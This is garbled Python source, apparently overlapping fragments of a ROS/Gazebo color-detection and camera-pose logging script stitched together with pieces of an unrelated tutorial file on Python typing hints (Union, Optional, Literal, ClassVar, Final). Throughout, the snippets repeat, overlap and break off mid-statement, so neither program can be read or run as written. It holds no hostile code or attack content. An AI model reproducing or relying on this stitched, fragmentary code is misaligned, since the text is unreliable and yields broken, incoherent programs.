cv.imshow(\"Frame\", frame)", "from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from", "= math.tan(KY * y - pitch) * z # x_ = math.tan(KX *", "= time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask =", "frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not", "for camera capture..\") frame = cap.capture() while frame is None and not rospy.is_shutdown():", "math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState", "cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5,", "/ FH / 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv", "x_ = math.tan(KX * x + roll) * z # y_ = math.tan(KY", "= ColorDetection(lower_threshold, upper_threshold) 
rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is", "x + roll) * z # y_ = math.tan(KY * y + pitch", "# CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv)", "global z, roll, pitch, yaw x_ = math.tan(KX * x - roll) *", "def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose = msg.pose[1] z", "rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X,", "gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg", "(out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15", "import Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations import", "== \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam',", "= csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X',", "math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x, out_y) if __name__ ==", "(160, 190, 220) upper_threshold = (180, 230, 255) FW = 320 FH =", "(X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y", "'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position", "0 roll = 0 pitch = 0 yaw = 0 def models_cb(msg): global", "= math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x, out_y) if __name__", "'Real Position X', 'Real Position Y']) waktu = rospy.Time(0) pose = Pose() z", "cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer =", "cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x", "y_ return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15)", "queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)", "= 0 pitch = 0 yaw = 0 def models_cb(msg): global pose, z,", "while frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\")", "= rospy.Time.now() def trans_data(x, y): global z, roll, pitch, yaw x_ = math.tan(KX", "cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX,", "cv.waitKey(15) if key == 27: break fps = 0.9 * fps + 0.1", "color_detection import ColorDetection import cv2 as cv import rospy import time import math", "cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) =", "= math.tan(KX * x - roll) * z y_ = math.tan(KY * y", "* y_ out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x,", "- pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x,", "cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for 
camera capture..\") frame =", "from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold", "FOVY / FH / 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w')", "cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame", "FW = 320 FH = 240 FOVX = 62.2 FOVY = 48.8 KX", "%f; ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y,", "ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion", "= trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y - pose.position.y)", "x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) * x_ - math.sin(yaw) *", "190, 220) upper_threshold = (180, 230, 255) FW = 320 FH = 240", "upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is None and", "5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127,", "KY = FOVY / FH / 180.0 * math.pi # CSV cam_csv =", "rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown(): frame =", "cY) = cd.centroid centroid = PointStamped() centroid.point.x = cX - 160 centroid.point.y =", "= 0 roll = 0 pitch = 0 yaw = 0 def models_cb(msg):", "ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y =", "rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX,", "127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key ==", "127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask,", "/ FW / 180.0 * math.pi KY = FOVY / FH / 180.0", "FOVX / FW / 180.0 * math.pi KY = FOVY / FH /", "rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time()", "rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state =", "msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global", "out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) *", "%.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\",", "from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from", "cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\",", "220) upper_threshold = (180, 230, 255) FW = 320 FH = 240 FOVX", "import csv lower_threshold = (160, 190, 220) upper_threshold = (180, 230, 255) FW", "pitch, yaw x_ = math.tan(KX * x - roll) * z y_ =", "pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose", "KX = FOVX / FW / 180.0 * math.pi KY = FOVY /", "__name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub =", "Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) 
rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state',", "is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps =", "+ 0.1 * 1 / (time.time() - t) t = time.time() rate.sleep() except", "not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid:", "+ roll) * z # y_ = math.tan(KY * y + pitch -", "rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub =", "model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5", "y - pitch) * z # x_ = math.tan(KX * x + roll)", "cX - 160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp =", "import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import", "* x - roll) * z y_ = math.tan(KY * y - pitch)", "out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS", "cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y", "pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd =", "= rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid =", "160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid)", "Position Y']) waktu = rospy.Time(0) pose = Pose() z = 0 roll =", "# if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\"", "cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230),", "from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from", "27: break fps = 0.9 * fps + 0.1 * 1 / (time.time()", "rospy.Time(0) pose = Pose() z = 0 roll = 0 pitch = 0", "-centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY:", "'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position", "SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point", "% fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask)", "= open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv)", "cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x +", "cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states',", "Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y']) waktu = rospy.Time(0) pose", "centroid.point.x = cX - 160 centroid.point.y = cY - 120 centroid.point.y = -centroid.point.y", "FH / 180.0 * 
import ta_vision
from vision.camera import Camera
from color_detection import ColorDetection

import cv2 as cv
import rospy
import time
import math
import csv

from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from geometry_msgs.msg import Quaternion
from gazebo_msgs.msg import ModelStates
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import SetModelState
from tf.transformations import euler_from_quaternion, quaternion_from_euler

# Colour band for the detector and the camera's optical parameters.
lower_threshold = (160, 190, 220)
upper_threshold = (180, 230, 255)

FW = 320                          # frame width in pixels
FH = 240                          # frame height in pixels
FOVX = 62.2                       # horizontal field of view in degrees
FOVY = 48.8                       # vertical field of view in degrees
KX = FOVX / FW / 180.0 * math.pi  # radians per horizontal pixel
KY = FOVY / FH / 180.0 * math.pi  # radians per vertical pixel

# CSV datalog: camera-estimated position vs. ground-truth model position.
cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w')
real_csv = open('/home/musyafa/Datalog/real.csv', 'w')
cam_writer = csv.writer(cam_csv)
real_writer = csv.writer(real_csv)
cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y'])
real_writer.writerow(['Time', 'Real Position X', 'Real Position Y'])
waktu = rospy.Time(0)

pose = Pose()
z = 0
roll = 0
pitch = 0
yaw = 0


def models_cb(msg):
    """Track the observed model's pose and attitude from /gazebo/model_states."""
    global pose, z, roll, pitch, yaw, waktu
    pose = msg.pose[1]
    z = msg.pose[1].position.z
    orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y,
                        msg.pose[1].orientation.z, msg.pose[1].orientation.w]
    (roll, pitch, yaw) = euler_from_quaternion(orientation_list)
    waktu = rospy.Time.now()


def trans_data(x, y):
    """Project a pixel offset (x, y) onto the ground plane in world coordinates."""
    global z, roll, pitch, yaw
    x_ = math.tan(KX * x - roll) * z
    y_ = math.tan(KY * y - pitch) * z
    # x_ = math.tan(KX * x + roll) * z
    # y_ = math.tan(KY * y + pitch - 1.57079632679) * z
    out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_
    out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_
    return (out_x, out_y)
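# Note on frames (added commentary): with zero roll/pitch and yaw = 0, the
# rotation above maps the camera's +x axis onto world +y and the camera's +y
# axis onto world -x, i.e. trans_data also absorbs the 90-degree offset
# between image axes and Gazebo world axes. For example, at z = 1.0 m a
# centroid 40 px right of centre gives x_ = tan(KX * 40) ~= 0.137 m, which
# comes out as (out_x, out_y) ~= (0.0, 0.137).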
if __name__ == "__main__":
    cap = None  # so the cleanup below is safe even if Camera() never ran
    try:
        rospy.init_node("color_detection")
        rate = rospy.Rate(15)  # 15 FPS

        cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5)
        real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5)
        cam_pub = rospy.Publisher("camera/data", PointStamped, queue_size=10)
        rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb)
        set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
        rospy.wait_for_message('/gazebo/model_states', ModelStates)

        # Park the camera model at the starting corner of the sweep.
        model = ModelState()
        model.model_name = 'pi_cam'
        model.pose = pose
        model.pose.position.x = -0.5
        model.pose.position.y = -0.5
        set_state(model_state=model)

        cap = Camera(port=5600)
        cd = ColorDetection(lower_threshold, upper_threshold)

        rospy.loginfo("Wait for camera capture..")
        frame = cap.capture()
        while frame is None and not rospy.is_shutdown():
            rate.sleep()
            frame = cap.capture()
        rospy.loginfo("Frame captured!")

        fps = 30.0
        t = time.time()
        while not rospy.is_shutdown():
            frame = cap.capture()
            t_cap = rospy.Time.now()
            mask = cd.update(frame)
            if cd.centroid:
                # Shift the centroid to image-centre coordinates (y pointing up).
                (cX, cY) = cd.centroid
                centroid = PointStamped()
                centroid.point.x = cX - 160
                centroid.point.y = cY - 120
                centroid.point.y = -centroid.point.y
                centroid.header.stamp = t_cap
                cam_pub.publish(centroid)
                (X, Y) = trans_data(centroid.point.x, centroid.point.y)
                rospy.loginfo("ERRX: %f; ERRY: %f", X - pose.position.x, Y - pose.position.y)
                cam_pos = Point(x=X, y=Y, z=1)
                cam_pos_pub.publish(cam_pos)
                cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y])
            real_writer.writerow([waktu, pose.position.x, pose.position.y])

            # Sweep the model diagonally; stop once it reaches x = 0.5.
            pose.position.x = pose.position.x + 0.001
            pose.position.y = pose.position.y + 0.001
            model.pose = pose
            set_state(model_state=model)
            real_pos_pub.publish(pose.position)
            if pose.position.x >= 0.5:
                break

            if cd.has_centroid:
                cv.circle(frame, cd.centroid, 5, 127, -1)
                cv.putText(frame, "fps: %.1f" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)
            # if cd.has_centroid:
            #     cv.circle(mask, cd.centroid, 5, 127, -1)
            #     cv.putText(mask, "fps: %.1f" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)
            cv.imshow("Frame", frame)
            # cv.imshow("Frame", mask)
            key = cv.waitKey(15)
            if key == 27:  # Esc quits
                break

            # Exponential moving average of the frame rate.
            fps = 0.9 * fps + 0.1 * 1 / (time.time() - t)
            t = time.time()
            rate.sleep()
    except rospy.ROSInterruptException:
        pass

    if cap is not None:
        cap.close()
    cv.destroyAllWindows()
    cam_csv.close()
    real_csv.close()
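# ---------------------------------------------------------------------------
# The ColorDetection class used above lives in an external module. As a rough,
# self-contained sketch of what such a detector typically does (an assumption,
# not this project's actual implementation; detect_centroid is a hypothetical
# name): threshold the frame into a binary mask and take the centroid of the
# mask via image moments.
import cv2 as cv
import numpy as np

def detect_centroid(frame_bgr, lower, upper):
    """Return ((cX, cY), mask), or (None, mask) if nothing passes the threshold."""
    hsv = cv.cvtColor(frame_bgr, cv.COLOR_BGR2HSV)
    mask = cv.inRange(hsv, np.array(lower), np.array(upper))
    m = cv.moments(mask)
    if m["m00"] == 0:
        return None, mask
    return (int(m["m10"] / m["m00"]), int(m["m01"] / m["m00"])), mask

# Quick check on a synthetic image: a bright patch centred near (200, 60).
img = np.zeros((240, 320, 3), dtype=np.uint8)
img[50:70, 190:210] = (255, 255, 255)
centroid, _ = detect_centroid(img, (0, 0, 200), (180, 30, 255))
print(centroid)  # roughly (199, 59)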
[ "if a == b: return True elif a < b: return -1 elif", "ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"}", "return a + b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo", "Tuple, Union # This a tuple defined with variable lenght def print_tuple(data: Tuple[Any,", "defined with variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a:", "{err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if name is None: return", "[1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr)", "ClassVar, Final, List, Literal, Optional, Tuple, Union # This a tuple defined with", "with open(file, mode) as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars:", "elif a > b: return +1 else: return False except Exception as err:", "a > b: return +1 else: return False except Exception as err: return", "= 9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class Connection: # TIMEOUT:", "{} # print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} #", "open(file, mode) as fp: print(fp.read()) elif mode == 'w': with open(file, mode) as", "typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE) #", "a tuple defined with variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data)", "int]] = {} print(vardict) obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict", "b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo \", b\"bar \")", "# TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def", "def concat(a: AnyStr, b: AnyStr) -> AnyStr: return a + b concat(f\"foo \",", "AnyStr: return a + b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \")", "test_optional(name: Optional[str] = None) -> Optional[str]: if name is None: return None return", "if name is None: return None return f\"Hello {name}\" def test_callable(func: Callable, name:", "print(fp.read()) elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey, this is", "fp.write(\"Hey, this is a text\") # class WithoutClassVars: # vardict = {} #", "test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with open(file,", "10} # Testing typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE += 1", "WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars:", "return False except Exception as err: return f\"Error - {err}\" def test_optional(name: Optional[str]", "mode == 'r': with open(file, mode) as fp: print(fp.read()) elif mode == 'w':", "{\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars()", "# class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) ->", "class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr:", "print(data) def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int, str]: try:", "float]) -> Union[bool, int, str]: try: if a == b: return True elif", "= WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class", "AnyStr) -> AnyStr: return a + b concat(f\"foo \", u\"bar \") concat(b\"foo \",", "elif a < b: return -1 elif a > b: return +1 else:", "= None) -> Optional[str]: if name is None: return None return f\"Hello {name}\"", "None 
return f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional,", "b: return +1 else: return False except Exception as err: return f\"Error -", "None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if", "Union # This a tuple defined with variable lenght def print_tuple(data: Tuple[Any, ...])", "List, Literal, Optional, Tuple, Union # This a tuple defined with variable lenght", "None) -> Optional[str]: if name is None: return None return f\"Hello {name}\" def", "print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float], b: Union[int, float])", "Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class Connection: #", "a + b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo \",", "def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str,", "Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40]", "# class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT", "+ b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo \", b\"bar", "print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): #", "as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars: # vardict =", "WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj", "if mode == 'r': with open(file, mode) as fp: print(fp.read()) elif mode ==", "mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with open(file, mode) as", "fp: print(fp.read()) elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey, this", "# MAX_SIZE: Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class", "= WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing", "text\") # class WithoutClassVars: # vardict = {} # print(vardict) # obj =", "AnyStr, b: AnyStr) -> AnyStr: return a + b concat(f\"foo \", u\"bar \")", "-1 elif a > b: return +1 else: return False except Exception as", "Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r',", "obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str,", "with open(file, mode) as fp: print(fp.read()) elif mode == 'w': with open(file, mode)", "{name}\" def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file:", "lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float], b:", "str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb',", "b: Union[int, float]) -> Union[bool, int, str]: try: if a == b: return", "-> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']):", "concat(a: AnyStr, b: AnyStr) -> AnyStr: return a + b concat(f\"foo \", u\"bar", "Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union # This a", "Union[int, float]) -> Union[bool, int, str]: try: if a == b: 
return True", "a < b: return -1 elif a > b: return +1 else: return", "return +1 else: return False except Exception as err: return f\"Error - {err}\"", "mode) as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars: # vardict", "Union[int, float], b: Union[int, float]) -> Union[bool, int, str]: try: if a ==", "b: return -1 elif a > b: return +1 else: return False except", "variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float],", "False except Exception as err: return f\"Error - {err}\" def test_optional(name: Optional[str] =", "return -1 elif a > b: return +1 else: return False except Exception", "None: return None return f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None:", "10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars() #", "-> Optional[str]: if name is None: return None return f\"Hello {name}\" def test_callable(func:", "from typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union", "Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union # This a tuple defined", "# print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection):", "'r': with open(file, mode) as fp: print(fp.read()) elif mode == 'w': with open(file,", "a == b: return True elif a < b: return -1 elif a", "WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing typing.Final", "b: return True elif a < b: return -1 elif a > b:", "Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float], b: Union[int, float]) ->", "open(file, mode) as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars: #", "print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode", "= {} # print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"}", "# print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict", "f\"Error - {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if name is", "return True elif a < b: return -1 elif a > b: return", "TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr: return a +", "return f\"Error - {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if name", "as err: return f\"Error - {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]:", "f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def", "# WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict)", "TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a:", "elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey, this is a", "def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with", "True elif a < b: return -1 elif a > b: return +1", "== 'r': with open(file, mode) as fp: print(fp.read()) elif mode == 'w': with", "def test_optional(name: Optional[str] = None) -> Optional[str]: if name is None: return None", "as fp: print(fp.read()) elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey,", "mode) as fp: print(fp.read()) elif mode == 'w': with open(file, mode) as fp:", "with variable lenght def 
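# Added illustration (not part of the original file): the accepted Literal
# values can be recovered at runtime with typing.get_args, which is handy for
# building validation or argparse choices from the annotation itself.
from typing import get_args

MODES = get_args(test_literals.__annotations__["mode"])
print(MODES)  # ('r', 'w', 'rb', 'wb')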
# class WithoutClassVars:
#     vardict = {}
#     print(vardict)
#
# obj = WithoutClassVars()
# obj.vardict = {"name": "matrix"}
# WithoutClassVars.vardict = {"val": 10}


class WithClassVars:
    vardict: ClassVar[dict[str, int]] = {}
    print(vardict)


obj = WithClassVars()
# obj.vardict = {"name": "matrix"}   # mypy: cannot assign to a ClassVar via an instance
WithClassVars.vardict = {"val": 10}

# Testing typing.Final
# MAX_SIZE: Final = 9000
# MAX_SIZE += 1                      # mypy: cannot assign to a Final name
# print(MAX_SIZE)

# class Connection:
#     TIMEOUT: Final[List[int]] = [1, 2, 3, 4, 5, 6]
#
# class FastConnector(Connection):
#     TIMEOUT = [50, 30, 40]         # mypy: cannot override a Final attribute


def concat(a: AnyStr, b: AnyStr) -> AnyStr:
    return a + b


concat(f"foo ", u"bar ")
concat(b"foo ", b"bar ")
# concat(u"foo ", b"bar ")           # rejected by type checkers and raises TypeError at runtime
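# Added sketch (my addition, not in the original file): AnyStr is just a
# constrained TypeVar, TypeVar('AnyStr', str, bytes). The same mechanism works
# for any constraint set of your own; repeat below is a hypothetical example.
from typing import TypeVar

S = TypeVar("S", str, bytes)

def repeat(value: S, times: int) -> S:
    # A checker binds S to str or bytes per call site; mixing is rejected.
    return value * times

print(repeat("ab", 3))   # 'ababab'  (S = str)
print(repeat(b"ab", 3))  # b'ababab' (S = bytes)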
